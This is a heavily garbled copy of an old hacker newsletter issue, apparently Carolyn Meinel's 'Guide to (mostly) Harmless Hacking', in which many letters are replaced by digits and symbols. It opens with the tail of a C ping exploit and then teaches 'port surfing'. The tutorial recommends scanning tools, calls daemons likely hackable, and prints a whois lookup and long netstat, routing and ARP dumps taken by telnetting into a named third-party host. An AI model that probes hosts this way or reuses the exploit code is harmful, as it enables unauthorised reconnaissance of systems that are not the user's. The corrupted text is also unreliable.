%struct sockaddr >'Wdst8 si4eof dst' O C' ] f1rintf%stderr8 Goffset Rd: G8 offset'S 1error%GsendtoG'S _ if %offset ^ ^ C' ] icm10 Picm1 t&1e ^ CS icm10 Picm1 code ^ CS icm10 Picm1 cksum ^ CS _ _ _ %#nd of ?ennerIs 1ing ex1loit message-' >>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > D$" C(, !$ T$ N(IL ,$T#: ,ot onl& is t2is 2ack not elite8 if &ou are reading t2is &ou donIt kno3 enoug2 to kee1 from getting .usted from doing t2is 1ing 2ack- $n t2e ot2er 2and8 if &ou 3ere to do it to an Internet 2ost in IraH-->>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > $f course t2ere are man& ot2er ke3l t2ings &ou can do 3it2 1ing- If &ou 2a9e a s2ell account8 &ou can find out lots of stu12 a.out 1ing .& gi9ing t2e command: man 1ing

In fact8 &ou can get lots of details on an& "nix command 3it2 Gman-G Ha9e fun 3it2 1ing 00 and .e good! 5ut remem.er8 IIm not .egging t2e e9il genius 3anna.es to .e good- See if I care 32en &ou get .usted--To su.scri.e8 email 2ackerKtec2.roker-com 3it2 message ;su.scri.e 22-< To send me confidential email %1lease8 no discussions of illegal acti9ities' use cmeinelKtec2.roker-comPlease direct flames to de9/nullKtec2.roker-com- Ha11& 2acking! Co1&rig2t /FFB Carol&n P- *einel- Dou ma& for3ard t2e !"ID# T$ %mostl&' H()*L#SS H(C+I,! as long as &ou lea9e t2is notice at t2e end-!"ID# T$ %mostl&' H()*L#SS H(C+I,! Vol- 2 ,um.er M *ore intro to TCP/IP: 1ort surfing! Daemons! Ho3 to get on almost an& com1uter 3it2out logging in and 3it2out .reaking t2e la3- Im1ress &our clueless friends and actuall& disco9er ke3l8 legal8 safe stu12( fe3 da&s ago I 2ad a lad& friend 9isiting- S2e6s M2 and doesn6t o3n a com1uter- Ho3e9er8 s2e is taking a class on 1ersonal com1uters at a communit& college- S2e 3anted to kno3 32at all t2is 2acking stu12 is a.out- So I decided to introduce 2er to 1ort surfing- (nd 32ile doing it8 3e stum.led across somet2ing ke3lPort surfing takes ad9antage of t2e structure of TCP/IP- T2is is t2e 1rotocol %set of rules' used for com1uters to talk to eac2 ot2er o9er t2e Internet- $ne of t2e .asic 1rinci1les of "nix %t2e most 1o1ular o1erating s&stem on t2e Internet' is to assign a ;1ort < to e9er& function t2at one com1uter mig2t command anot2er to 1erform- Common exam1les are to send and recei9e email8 read "senet ne3sgrou1s8 telnet8 transfer files8 and offer =e. 1ages>>>>>>> >> > > > > > > > > > > > > > > > ,e3.ie note X/: ( com1uter 1ort is a 1lace 32ere information goes in or out of it- $n &our 2ome com1uter8 exam1les of 1orts are &our monitor8 32ic2 sends information out8 &our ke&.oard and mouse8 32ic2 send information in8 and &our modem8 32ic2 sends information .ot2 out and in5ut an Internet 2ost com1uter suc2 as callisto-unm-edu 2as man& more 1orts t2an a t&1ical 2ome com1uter- T2ese 1orts are identified .& num.ers- ,o3 t2ese are not all 12&sical 1orts8 like a ke&.oard or )S2@2 serial 1ort %for &our modem'- T2e& are 9irtual %soft3are' 1orts( ;ser9ice < is a 1rogram running on a ;1ort- < =2en &ou telnet to a 1ort8 t2at 1rogram is u1 and running8 7ust 3aiting for &our in1ut- Ha11& 2acking! >>>>>>> >> > > > > > > > > > > > > > > > So if &ou 3ant to read a =e. 1age8 &our .ro3ser contacts 1ort num.er AC and tells t2e com1uter t2at manages t2at =e. site to let &ou in- (nd8 sure enoug28 &ou get into t2at =e. ser9er com1uter 3it2out a 1ass3ord$+8 .ig deal- T2at6s 1rett& standard for t2e Internet- *an& 00 most 00 com1uters on t2e Internet 3ill let &ou do some t2ings 3it2 t2em 3it2out needing a 1ass3ord8 Ho3e9er8 t2e essence of 2acking is doing t2ings t2at aren6t o.9ious- T2at don6t 7ust 7um1 out at &ou from t2e manuals- $ne 3a& &ou can mo9e a ste1 u1 from t2e run of t2e mill com1uter user is to learn 2o3 to 1ort surfT2e essence of 1ort surfing is to 1ick out a target com1uter and ex1lore it to see 32at 1orts are o1en and 32at &ou can do 3it2 t2em,o3 if &ou are a la4& 2acker &ou can use canned 2acker tools suc2 as Satan or ,etcat- T2ese are 1rograms &ou can run from Linux8 ?ree5SD or Solaris %all t&1es of "nix' from &our PC- T2e& automaticall& scan &our target com1uters- T2e& 3ill tell &ou 32at 1orts are in use- T2e& 3ill also 1ro.e t2ese 1orts for 1resence of daemons 3it2 kno3 securit& fla3s8 and tell &ou 32at t2e& are>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > > ,e3.ie note X 2: ( daemon is not some sort of grinc2 or gremlin or BBB gu&- It is a 1rogram t2at runs in t2e .ackground on man& %.ut not all' "nix s&stem 1orts- It 3aits for &ou to come along and use it- If &ou find a daemon on a 1ort8 it6s 1ro.a.l& 2acka.le- Some 2acker tools 3ill tell &ou 32at t2e 2acka.le features are of t2e daemons t2e& detect>>>>>>> >> > > > > > > > > > > > > > > > > > > > > > > >

Ho3e9er8 t2ere are se9eral reasons to surf 1orts .& 2and instead of automaticall&/' Dou 3ill learn somet2ing- Pro.ing manuall& &ou get a gut feel for 2o3 t2e daemon running on t2at 1ort .e2a9es- It6s t2e difference .et3een 3atc2ing an x0rated mo9ie and %.lus2'2' Dou can im1ress &our friends- If &ou run a canned 2acker tool like Satan &our friends 3ill look at &ou and sa&8 ;5ig deal- I can run 1rograms8 too-< T2e& 3ill immediatel& catc2 on to t2e dirt& little secret of t2e 2acker 3orld- *ost 2acking ex1loits are 7ust lamer4 running 1rograms t2e& 1icked u1 from some 55S or ft1 site- 5ut if &ou enter commands ke&stroke .& ke&stroke t2e& 3ill see &ou using &our .rain- (nd &ou can 2el1 t2em 1la& 3it2 daemons8 too8 and gi9e t2em a giant rus2@' T2e trul& elite 2ackers surf 1orts and 1la& 3it2 daemons .& 2and .ecause it is t2e onl& 3a& to disco9er somet2ing ne3- T2ere are onl& a fe3 2undred 2ackers 00 at most 00 32o disco9er ne3 stu12- T2e rest 7ust run canned ex1loits o9er and o9er and o9er again- 5oring- 5ut I am teac2ing &ou 2o3 to reac2 t2e 1innacle of 2ackerdom,o3 let me tell &ou 32at m& middle aged friend and I disco9ered 7ust messing around- ?irst8 3e decided 3e didn6t 3ant to 3aste our time messing 3it2 some minor little 2ost com1uter- He&8 let6s go for t2e .ig time! So 2o3 do &ou find a .ig ka2una com1uter on t2e Internet: =e started 3it2 a domain 32ic2 consisted of a L(, of PCs running Linux t2at I 2a11ened to alread& kno3 a.out8 t2at is used .& t2e ,e3 *exico Internet (ccess ISP: nmia-com>>>>>>> >> > > > > > > > > > > > > > > > > > > > > ,e3.ie ,ote X @: ( domain is an Internet address- Dou can use it to look u1 32o runs t2e com1uters used .& t2e domain8 and also to look u1 2o3 t2at domain is connected to t2e rest of t2e Internet>>>>>>> >> > > > > > > > > > > > > > > > > > > > > So to do t2is 3e first logged into m& s2ell account 3it2 Sout23est C&.er1ort- I ga9e t2e command: Oslug P YBBZ 0P32ois nmia-com ,e3 *exico Internet (ccess %,*I(0D$*' 22C/ 5uena Vista S# (l.uHuerHue8 ,* AE/CB Domain ,ame: ,*I(-C$* (dministrati9e Contact8 Tec2nical Contact8 bone Contact: $rrell8 Stan %S$//' S($K,*I(-C$* %LCL' AEE0 CB/E )ecord last u1dated on //0 *ar0 FM)ecord created on //0 *ar0 FMDomain ser9ers in listed order: ,S-,*I(-C$* /FA-LF-/BB-/C !)(,D#-,*-$)! /2F-/2/-/-2 ,o3 it6s a good .et t2at grande-nm-org is ser9ing a lot of ot2er Internet 2osts .eside nmia-comHere6s 2o3 3e 1ort surf our 3a& to find t2is out: Oslug P YBEZ 0Ptelnet grande-nm-org /L Tr&ing /2F-/2/-/-2 --Connected to grande-nm-org#sca1e c2aracter is I [Z IT!V *ulti,et V@-L )e9 58 V(U MCCC0 MCC8 $1enV*S V(U VB-/ Product License (ut2ori4ation #x1iration Date 0000000000 0000000 0000000000000 000000000000000 *"LTI,#T Des (0/@E0 /BM/ %none' ,?S0CLI#,T Des (0/@E0 //@2@E %none' >>> Configuration for file G*"LTI,#T:,#T=$)+ D#VIC#S-C$,?I!")(TI$,G >>> De9ice (da1ter CS) (ddress ?lags/Vector 000000 0000000 00000000000 000000000000 seC %S2ared V*S #t2ernet/?DDI' 0,$,#0 0,$,#0 0,$,#0 *ulti,et (cti9e Connections8 including ser9ers: Proto )c90J Snd0J Local (ddress %Port' ?oreign (ddress %Port' State 00000 00000 00000 000000000000000000 000000000000000000 00000

TCP C A22 !)(,D#-,*-$)!%,#TST(T' /FA-LF-//L-2M%/LBF' #ST(5LISH#D TCP C C !)(,D#-,*-$)!%P$P@' /BM-BM-2C/-BE%/2LB' #ST(5LISH#D TCP C C !)(,D#-,*-$)!%MF/A' /2F-/2/-2LM-L%T#L,#T' #ST(5LISH#D TCP C C !)(,D#-,*-$)!%T#L,#T' (V(T()-,*-$)!%@/M/' #ST(5LISH#D TCP C C >%,(*#S#)VIC#' >%>' LIST#, TCP C C >%T#L,#T' >%>' LIST#, TCP C C >%?TP' >%>' LIST#, TCP C C >%?I,!#)' >%>' LIST#, TCP C C >%,#TST(T' >%>' LIST#, TCP C C >%S*TP' >%>' LIST#, TCP C C >%L$!I,' >%>' LIST#, TCP C C >%SH#LL' >%>' LIST#, TCP C C >%#U#C' >%>' LIST#, TCP C C >%)PC' >%>' LIST#, TCP C C >%,#TC$,T)$L' >%>' LIST#, TCP C C >%SDST(T' >%>' LIST#, TCP C C >%CH()!#,' >%>' LIST#, TCP C C >%D(DTI*#' >%>' LIST#, TCP C C >%TI*#' >%>' LIST#, TCP C C >%#CH$' >%>' LIST#, TCP C C >%DISC()D' >%>' LIST#, TCP C C >%P)I,T#)' >%>' LIST#, TCP C C >%P$P2' >%>' LIST#, TCP C C >%P$P@' >%>' LIST#, TCP C C >%+#)5#)$S *(ST#)' >%>' LIST#, TCP C C >%+L$!I,' >%>' LIST#, TCP C C >%+SH#LL' >%>' LIST#, TCP C C !)(,D#-,*-$)!%M/EM' $S$-,*-$)!%U//' #ST(5LISH#D TCP C C !)(,D#-,*-$)!%M/E2' $S$-,*-$)!%U//' #ST(5LISH#D TCP C C !)(,D#-,*-$)!%M/E/' $S$-,*-$)!%U//' #ST(5LISH#D TCP C C >%?S' >%>' LIST#, "DP C C >%,(*#S#)VIC#' >%>' "DP C C /2E-C-C-/%,(*#S#)VIC#' >%>' "DP C C !)(,D#-,*-$)%,(*#S#)V' >%>' "DP C C >%T?TP' >%>' "DP C C >%5$$TPS' >%>' "DP C C >%+#)5#)$S' >%>' "DP C C /2E-C-C-/%+#)5#)$S' >%>' "DP C C !)(,D#-,*-$)%+#)5#)$S' >%>' "DP C C >%>' >%>' "DP C C >%S,*P' >%>' "DP C C >%)PC' >%>' "DP C C >%D(DTI*#' >%>' "DP C C >%#CH$' >%>' "DP C C >%DISC()D' >%>' "DP C C >%TI*#' >%>' "DP C C >%CH()!#,' >%>' "DP C C >%T(L+' >%>' "DP C C >%,T(L+' >%>' "DP C C >%/C2@' >%>' "DP C C >%UD*CP' >%>' *ulti,et registered )PC 1rograms: Program Version Protocol Port 0000000 0000000 00000000 0000 P$)T*(P 2 TCP /// P$)T*(P 2 "DP /// *ulti,et IP )outing ta.les:

Destination !ate3a& ?lags )efcnt "se Interface *T" 0000000000 0000000000 00000 000000 00000 000000000 0000 /FA-LF-/BE-/ L(=)II-,*-$)! "18!ate3a&8H C 2 seC /LCC /BB-ML-C-/ #,SS@BL-,*-$)! "18!ate3a&8H C M/B2 seC /LCC 2CL-/@A-/@A-/ #,SS@BL-,*-$)! "18!ate3a&8H C E/ seC /LCC 2CM-/2E-/BC-/ #,SS@BL-,*-$)! "18!ate3a&8H C 2FA seC /LCC /2E-C-C-/ /2E-C-C-/ "18Host L //A@L/@ loC M/@B /FA-LF-/BE-2 L(=)II-,*-$)! "18!ate3a&8H C BMC seC /LCC /F2-/@2-AF-2 #,SS@BL-,*-$)! "18!ate3a&8H C E2F seC /LCC 2CE-EE-LB-2 #,SS@BL-,*-$)! "18!ate3a&8H C L seC /LCC 2CM-FE-2/@-2 #,SS@BL-,*-$)! "18!ate3a&8H C 2BM/ seC /LCC /FM-FC-EM-BB #,SS@BL-,*-$)! "18!ate3a&8H C / seC /LCC 2CM-2L2-/C2-2 #,SS@BL-,*-$)! "18!ate3a&8H C /CF seC /LCC 2CL-/BC-2M@-2 #,SS@BL-,*-$)! "18!ate3a&8H C EA seC /LCC 2C2-2/@-M-2 #,SS@BL-,*-$)! "18!ate3a&8H C M seC /LCC 2C2-2/B-22M-BB #,SS@BL-,*-$)! "18!ate3a&8H C //@ seC /LCC /F2-/@2-AF-@ #,SS@BL-,*-$)! "18!ate3a&8H C //CC seC /LCC /FA-2C@-/FB-BE #,SS@BL-,*-$)! "18!ate3a&8H C @AL seC /LCC /BC-2CL-/@-@ #,SS@BL-,*-$)! "18!ate3a&8H C EA seC /LCC 2C2-2ME-/CE-/@/ #,SS@BL-,*-$)! "18!ate3a&8H C /F seC /LCC /FA-LF-/BE-M L(=)II-,*-$)! "18!ate3a&8H C A2 seC /LCC /2A-/MA-/LE-B #,SS@BL-,*-$)! "18!ate3a&8H C /FA seC /LCC /BC-ML-/C-B #,SS@BL-,*-$)! "18!ate3a&8H C @ seC /LCC /2A-/2/-LC-E #,SS@BL-,*-$)! "18!ate3a&8H C @CL2 seC /LCC 2CB-/EC-//@-A #,SS@BL-,*-$)! "18!ate3a&8H C /ML/ seC /LCC /2A-/MA-/2A-F #,SS@BL-,*-$)! "18!ate3a&8H C //22 seC /LCC 2C@-E-/@2-F #,SS@BL-,*-$)! "18!ate3a&8H C /M seC /LCC 2CM-2/B-LE-/C #,SS@BL-,*-$)! "18!ate3a&8H C /AC seC /LCC /@C-EM-/-EL #,SS@BL-,*-$)! "18!ate3a&8H C /C//E seC /LCC 2CB-BA-BL-/L #,SS@BL-,*-$)! "18!ate3a&8H C 2MF seC /LCC /2F-2/F-/@-A/ #,SS@BL-,*-$)! "18!ate3a&8H C LME seC /LCC 2CM-2LL-2MB-/A #,SS@BL-,*-$)! "18!ate3a&8H C //2L seC /LCC /BC-ML-2M-2/ #,SS@BL-,*-$)! "18!ate3a&8H C FE seC /LCC 2CB-2A-/BA-2/ #,SS@BL-,*-$)! "18!ate3a&8H C 2CF@ seC /LCC /B@-/EF-@-222 #,SS@BL-,*-$)! "18!ate3a&8H C @/L seC /LCC /FA-/CF-/@C-@@ #,SS@BL-,*-$)! "18!ate3a&8H C /A2L seC /LCC /FF-22M-/CA-@@ #,SS@BL-,*-$)! "18!ate3a&8H C //@B2 seC /LCC 2C@-E-/@2-FA #,SS@BL-,*-$)! "18!ate3a&8H C E@ seC /LCC /FA-///-2L@-@L #,SS@BL-,*-$)! "18!ate3a&8H C //@M seC /LCC 2CB-/MF-2M-/CC #,SS@BL-,*-$)! "18!ate3a&8H C @@FE seC /LCC /BL-2/2-/CL-/CB #,SS@BL-,*-$)! "18!ate3a&8H C /E seC /CCB 2CL-2@A-@-2M/ #,SS@BL-,*-$)! "18!ate3a&8H C BF seC /LCC /FA-MF-MM-2M2 #,SS@BL-,*-$)! "18!ate3a&8H C 2L seC /LCC /FM-22-/AA-2M2 #,SS@BL-,*-$)! "18!ate3a&8H C 2C seC /LCC /BM-BM-C L(=)II-,*-$)! "18!ate3a& / MC@EE seC /LCC C-C-C #,SS@BL-,*-$)! "18!ate3a& 2 ME2AEM/ seC /LCC 2CE-BB-/ !L$)D-,*-$)! "18!ate3a& C L/ seC /LCC 2CL-/BB-/ !L$)D-,*-$)! "18!ate3a& C /FEA seC /LCC 2CM-/@M-/ L(=)II-,*-$)! "18!ate3a& C LM seC /LCC 2CM-/@M-2 !L$)D-,*-$)! "18!ate3a& C /@A seC /LCC /F2-/@2-2 /2F-/2/-2MA-/ "18!ate3a& C B@ML seC /LCC 2CM-/@M-BE !L$)D-,*-$)! "18!ate3a& C 2C22 seC /LCC 2CB-2CB-BE !L$)D-,*-$)! "18!ate3a& C EEEA seC /LCC 2CB-2CB-BA L(=)II-,*-$)! "18!ate3a& C @/AL seC /LCC 2CE-BB-L !L$)D-,*-$)! "18!ate3a& C B2B seC /LCC 2CM-/@M-BF !L$)D-,*-$)! "18!ate3a& C EFFC seC /LCC 2CE-BB-B !L$)D-,*-$)! "18!ate3a& C L@ seC /LCC

2CM-/@M-EC L(=)II-,*-$)! "18!ate3a& C /AC// seC /LCC /F2-/AA-/@L !L$)D-,*-$)! "18!ate3a& C L seC /LCC 2CB-2CB-E/ L(=)II-,*-$)! "18!ate3a& C 2 seC /LCC 2CM-/@M-E !L$)D-,*-$)! "18!ate3a& C @A seC /LCC /FF-AF-/@L !L$)D-,*-$)! "18!ate3a& C FF seC /LCC /FA-LF-/@B L(=)II-,*-$)! "18!ate3a& C /2F@ seC /LCC 2CM-/@M-F !L$)D-,*-$)! "18!ate3a& C 2/ seC /LCC 2CM-/@M-E@ !L$)D-,*-$)! "18!ate3a& C LFEFM seC /LCC /2F-/@A-C !L$)D-,*-$)! "18!ate3a& C L2B2 seC /LCC /F2-F2-/C L(=)II-,*-$)! "18!ate3a& C /B@ seC /LCC 2CB-2CB-EL L(=)II-,*-$)! "18!ate3a& C BCM seC /LCC 2CE-BB-/@ !L$)D-,*-$)! "18!ate3a& C //AM seC /LCC 2CM-/@M-EE L(=)II-,*-$)! "18!ate3a& C @BMF seC /LCC 2CE-BB-/M !L$)D-,*-$)! "18!ate3a& C @@M seC /LCC 2CM-/@M-EA !L$)D-,*-$)! "18!ate3a& C 2@F seC /LCC 2CM-L2-2CE !L$)D-,*-$)! "18!ate3a& C 2F@ seC /LCC 2CM-/@M-EF !L$)D-,*-$)! "18!ate3a& C /2FM seC /LCC /F2-/BC-/MM L(=)II-,*-$)! "18!ate3a& C //E seC /LCC 2CB-2CB-AC P#,,D-,*-$)! "18!ate3a& C MBB@ seC /LCC 2CM-/@M-AC !L$)D-,*-$)! "18!ate3a& C F/ seC /LCC /FA-FF-2CF L(=)II-,*-$)! "18!ate3a& C //@B seC /LCC 2CE-BB-/E !L$)D-,*-$)! "18!ate3a& C 2M/E@ seC /LCC 2CM-/@M-A2 !L$)D-,*-$)! "18!ate3a& C 2FEBB seC /LCC /F2-M/-2// !L$)D-,*-$)! "18!ate3a& C /LL seC /LCC /F2-/AF-/ME L(=)II-,*-$)! "18!ate3a& C @/@@ seC /LCC 2CM-/@M-AM P#,,D-,*-$)! "18!ate3a& C /AF seC /LCC 2CM-/@M-AE L(=)II-,*-$)! "18!ate3a& C FM seC /LCC /MB-AA-C !L$)D-,*-$)! "18!ate3a& C /MC seC /LCC /F2-AM-2M !L$)D-,*-$)! "18!ate3a& C @L@C seC /LCC 2CM-/@M-AA L(=)II-,*-$)! "18!ate3a& C /@B seC /LCC /FA-MF-2/E !L$)D-,*-$)! "18!ate3a& C @C@ seC /LCC /F2-/@2-AF !L$)D-,*-$)! "18!ate3a& C @L/@ seC /LCC /FA-/EB-2/F !L$)D-,*-$)! "18!ate3a& C /2EA seC /LCC 2CB-2CB-F2 L(=)II-,*-$)! "18!ate3a& C /22A seC /LCC /F2-2@M-22C /2F-/2/-/-F/ "18!ate3a& C 2@@E seC /LCC 2CM-/@M-F2 L(=)II-,*-$)! "18!ate3a& C /@FFL seC /LCC /FA-LF-/LE L(=)II-,*-$)! "18!ate3a& C LCA seC /LCC 2CB-2CB-F@ !L$)D-,*-$)! "18!ate3a& C B@L seC /LCC 2CM-/@M-F@ !L$)D-,*-$)! "18!ate3a& C FCE seC /LCC /FA-LF-/LA L(=)II-,*-$)! "18!ate3a& C /M2/M seC /LCC /FA-LF-/LF L(=)II-,*-$)! "18!ate3a& C /ACB seC /LCC 2CM-/@M-FL P#,,D-,*-$)! "18!ate3a& C @BMM seC /LCC 2CB-2CB-FB !L$)D-,*-$)! "18!ate3a& C FFC seC /LCC 2CB-2CB-/B/ L(=)II-,*-$)! "18!ate3a& C L2A seC /LCC /FA-LF-FE P#,,D-,*-$)! "18!ate3a& C LL seC /LCC /FA-LF-/B/ L(=)II-,*-$)! "18!ate3a& C MFE seC /LCC /F2-2CE-22B !L$)D-,*-$)! "18!ate3a& C F@2/E seC /LCC /FA-LF-FF P#,,D-,*-$)! "18!ate3a& C 2 seC /LCC /FA-LF-/B@ !L$)D-,*-$)! "18!ate3a& C @@EF seC /LCC /F2-/@@-/CC L(=)II-,*-$)! "18!ate3a& C @BMF seC /LCC 2CM-/@M-/CC !L$)D-,*-$)! "18!ate3a& C A seC /LCC /2A-/BL-C P#,,D-,*-$)! "18!ate3a& C /LAL/ seC /LCC /FA-LF-/BL !L$)D-,*-$)! "18!ate3a& C 2EM seC /LCC 2CB-2CB-/BL L(=)II-,*-$)! "18!ate3a& C /BE seC /LCC 2CB-2CB-/C2 !L$)D-,*-$)! "18!ate3a& C L@/B seC /LCC /BC-2@C-C L(=)II-,*-$)! "18!ate3a& C /FMCA seC /LCC 2CB-2CB-/BB L(=)II-,*-$)! "18!ate3a& C /ELB seC /LCC

2CL-/BB-2@/ !L$)D-,*-$)! "18!ate3a& C @2M seC /LCC /FA-LF-/BE !L$)D-,*-$)! "18!ate3a& C /LBA seC /LCC 2CB-2CB-/C@ !L$)D-,*-$)! "18!ate3a& C @B2F seC /LCC /FA-LF-/BA !L$)D-,*-$)! "18!ate3a& C FCB@ seC /LCC 2CB-2CB-/CM !L$)D-,*-$)! "18!ate3a& C E@@@ seC /LCC 2CB-2CB-/BA !L$)D-,*-$)! "18!ate3a& C 2@M seC /LCC 2CM-/@M-/CL L(=)II-,*-$)! "18!ate3a& C MA2B seC /LCC 2CB-2CB-/CL L(=)II-,*-$)! "18!ate3a& C M22 seC /LCC 2CM-/@M-M/ L(=)II-,*-$)! "18!ate3a& C M/EA2 seC /LCC 2CB-2CB-/BF !L$)D-,*-$)! "18!ate3a& C L/C/ seC /LCC 2CM-/@M-M2 !L$)D-,*-$)! "18!ate3a& C /CEB/ seC /LCC 2CB-2CB-/EC !L$)D-,*-$)! "18!ate3a& C F/B seC /LCC /FA-MF-MM !L$)D-,*-$)! "18!ate3a& C @ seC /LCC /FA-LF-/CA !L$)D-,*-$)! "18!ate3a& C 2/2F seC /LCC 2CM-2F-2@B !L$)D-,*-$)! "18!ate3a& C /2L seC /LCC 2CB-2CB-/E2 !L$)D-,*-$)! "18!ate3a& C LA@F seC /LCC 2CM-/@M-/CA !L$)D-,*-$)! "18!ate3a& C @2/B seC /LCC 2CB-2CB-/E@ !L$)D-,*-$)! "18!ate3a& C @EM seC /LCC /FA-/EL-/E@ L(=)II-,*-$)! "18!ate3a& C B22E seC /LCC /FA-LF-//C !L$)D-,*-$)! "18!ate3a& C /EFE seC /LCC /FA-L/-2@A !L$)D-,*-$)! "18!ate3a& C /@LB seC /LCC /F2-/@B-//C !L$)D-,*-$)! "18!ate3a& C LA@ seC /LCC 2CM-/@M-MA !L$)D-,*-$)! "18!ate3a& C M2 seC /LCC /FA-/EL-/EB L(=)II-,*-$)! "18!ate3a& C @2 seC /LCC 2CB-2CB-//M L(=)II-,*-$)! "18!ate3a& C MM seC /LCC 2CB-2CB-/EF L(=)II-,*-$)! "18!ate3a& C /M seC /LCC /FA-LF-/EF P#,,D-,*-$)! "18!ate3a& C 222 seC /LCC /FA-LF-//L !L$)D-,*-$)! "18!ate3a& / /@2AAB seC /LCC 2CB-2CB-/A/ !L$)D-,*-$)! "18!ate3a& C /@LM seC /LCC 2CB-2CB-/A2 SI#,,(-,*-$)! "18!ate3a& C /B seC /LCC 2CB-2CB-//A !L$)D-,*-$)! "18!ate3a& C @M2@ seC /LCC 2CB-2CB-//F !L$)D-,*-$)! "18!ate3a& C 2A2 seC /LCC 2CB-2CB-/A@ SI#,,(-,*-$)! "18!ate3a& C 2ME@ seC /LCC /M@-/2C-C L(=)II-,*-$)! "18!ate3a& C /2@L@@ seC /LCC 2CB-2CB-/AM !L$)D-,*-$)! "18!ate3a& C ///M seC /LCC 2CL-/BE-/2C !L$)D-,*-$)! "18!ate3a& C M2C2 seC /LCC 2CB-2CB-/2/ !L$)D-,*-$)! "18!ate3a& / E/ seC /LCC /2F-/2/-C !)(,D#-,*-$)! "1 /2 2/BLALFF seC /LCC 2CM-/@M-/22 !L$)D-,*-$)! "18!ate3a& C /FL seC /LCC 2CM-/@M-LA !L$)D-,*-$)! "18!ate3a& C EECE seC /LCC /2A-/2@-C !L$)D-,*-$)! "18!ate3a& C @MM/B seC /LCC 2CM-/@M-LF !L$)D-,*-$)! "18!ate3a& C /CCE seC /LCC 2CM-/@M-/2M !L$)D-,*-$)! "18!ate3a& C @E/BC seC /LCC 2CB-2CB-/2M L(=)II-,*-$)! "18!ate3a& C EF seC /LCC 2CB-2CB-/2L P#,,D-,*-$)! "18!ate3a& C 2@@@LF seC /LCC 2CM-/@M-/2B !L$)D-,*-$)! "18!ate3a& C MFE seC /LCC 2CB-2CB-/2B L(=)II-,*-$)! "18!ate3a& C /@BMM seC /LCC 2CM-BF-/FC !L$)D-,*-$)! "18!ate3a& C MCLF seC /LCC 2CB-2CB-/FC !L$)D-,*-$)! "18!ate3a& C /B@C seC /LCC 2CM-/@M-/2E !L$)D-,*-$)! "18!ate3a& C MLB2/ seC /LCC 2CB-2CB-/F/ !L$)D-,*-$)! "18!ate3a& C @LEM seC /LCC *ulti,et IPU )outing ta.les: Destination !ate3a& ?lags )efcnt "se Interface *T" 0000000000 0000000000 00000 000000 00000 000000000 0000 *ulti,et ()P ta.le: Host ,et3ork (ddress #t2ernet (ddress (r1 ?lags 00000000000000000000000000000000000000000000 0000000000000000 000000000

!L$)D-,*-$)! %IP /2F-/2/-/-M' ((:CC:CM:CC:B/:DC Tem1orar& Y",+,$=,Z %IP /2F-/2/-2L/-/' CC:CC:CL:C/:2C:D2 Tem1orar& ,()(,N$-,*-$)! %IP /2F-/2/-/-LB' CA:CC:AE:CM:F?:M2 Tem1orar& CH(*(-,*-$)! %IP /2F-/2/-/-A' ((:CC:CM:CC:CC:DC Tem1orar& Y",+,$=,Z %IP /2F-/2/-2L/-L' ((:CC:CM:CC:D2:DC Tem1orar& L(=)II-,*-$)! %IP /2F-/2/-2LM-/C' ((:CC:CM:CC:LC:DC Tem1orar& Y",+,$=,Z %IP /2F-/2/-/-F/' CC:CC:CL:C/:2C:D2 Tem1orar& 5)(V$-,*-$)! %IP /2F-/2/-/-B' ((:CC:CM:CC:C5:DC Tem1orar& P#,,D-,*-$)! %IP /2F-/2/-/-/C' ((:CC:CM:CC:L?:DC Tem1orar& ())I5(-,*-$)! %IP /2F-/2/-/-/M' CA:CC:25:5C:C/:(E Tem1orar& (b"L-,*-$)! %IP /2F-/2/-/-L/' CA:CC:AE:CC:(/:D@ Tem1orar& #,SS@BL-,*-$)! %IP /2F-/2/-/-@' CC:CC:CC:L/:#?:LA Tem1orar& (V(T()-,*-$)! %IP /2F-/2/-2LM-/' CA:CC:L(:/D:L2:CD Tem1orar& Y",+,$=,Z %IP /2F-/2/-2L@-2' CA:CC:L(:ME:M(:/D Tem1orar& Y",+,$=,Z %IP /2F-/2/-2LM-L' CC:CC:E5:L?:L?:AC Tem1orar& C$,CH(S-,*-$)! %IP /2F-/2/-/-//' CA:CC:L(:ME:M(:/D Tem1orar& Y",+,$=,Z %IP /2F-/2/-2L@-/C' ((:CC:CM:CC:M5:DC Tem1orar& *ulti,et ,et3ork Interface statistics: ,ame *tu ,et3ork (ddress I1kts Ierrs $1kts $errs Collis 0000 000 0000000 00000000000000 00000 00000 00000 00000 000000 seC /LCC /2F-/2/-C !)(,D#-,*-$)! BAM22FMA C L@MF2A@@ / C loC M/@B /2E-C-C /2E-C-C-/ //AA/F/ C //AA/F/ C C *ulti,et Protocol statistics: BL2BM/E@ IP 1ackets recei9ed 22 IP 1ackets smaller t2an minimu m si4e BF2A IP fragments recei9ed M IP fragments timed out @M IP recei9ed for unreac2a.le destinations ECM/MC IC*P error 1ackets generated FBBE IC*P o1codes out of range M/EC 5ad IC*P 1acket c2ecksums E@M@B@ IC*P res1onses E@M@B@ IC*P G#c2oG 1ackets recei9ed E@M@B@ IC*P G#c2o )e1l&G 1ackets sent /A@@F IC*P G#c2o )e1l&G 1ackets recei9ed ECM/MC IC*P GDestination "nreac2a.leG 1ackets sent ML/2M@ IC*P GDestination "nreac2a.leG 1ackets recei9ed /MAA IC*P GSource Juenc2G 1ackets recei9ed /B@F// IC*P G)eDirectG 1ackets recei9ed /AFE@2 IC*P GTime #xceededG 1ackets recei9ed /2BFBB TCP connections initiated 2@@FFA TCP connections esta.lis2ed /@2B// TCP connections acce1ted BEFE2 TCP connections dro11ed 2A/A2 em.r&onic TCP connections dro11ed 2BF@FF TCP connections closed /CE//A@A TCP segments timed for )TT /CLCL/MC TCP segments u1dated )TT @F2E2BM TCP dela&ed (C+s sent BBB TCP connections dro11ed due to retransmit timeouts ///CMC TCP retransmit timeouts @/@B TCP 1ersist timeouts F TCP 1ersist connection dro1s /BALC TCP kee1ali9e timeouts //FL TCP kee1ali9e 1ro.es sent /M@F2 TCP connections dro11ed due to kee1ali9e timeouts 2AAM2BB@ TCP 1ackets sent

